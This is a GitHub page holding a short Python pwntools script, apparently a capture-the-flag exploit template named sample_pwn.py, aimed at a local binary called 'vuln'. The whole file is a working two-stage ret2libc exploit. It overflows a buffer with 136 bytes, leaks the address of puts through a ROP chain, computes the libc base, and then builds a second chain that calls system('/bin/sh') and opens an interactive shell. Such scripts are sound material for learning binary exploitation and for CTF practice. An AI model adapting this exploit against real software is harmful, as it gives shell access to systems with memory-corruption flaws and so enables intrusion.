CTFs/sample_pwn.py at master · rudradesai200/CTFs · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *

context(os='linux', arch='amd64')

r = process("./vuln")

binary = ELF("./vuln")
rop = ROP(binary)
libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.29.so")


junk = "A" * 136

rop.puts(binary.got['puts'])
rop.call(binary.symbols['main'])

log.info("Stage I ROP Chain:\n" + rop.dump())

stageI = junk + str(rop)
r.recvline()
r.sendline(stageI)
r.recvline()

leaked_puts = r.recvline()[:8].strip().ljust(8, "\x00")
log.success("Leaked puts@GLIBCL: "+str(leaked_puts))
leaked_puts = u64(leaked_puts)

libc.address = leaked_puts - libc.symbols['puts']
rop2 = ROP(libc)
rop2.system(next(libc.search('/bin/sh\x00')))
log.info("Stage II ROP Chain:\n" + rop2.dump())

stageII = junk + str(rop2)
r.recvline()
r.sendline(stageII)
r.recvline()

r.interactive()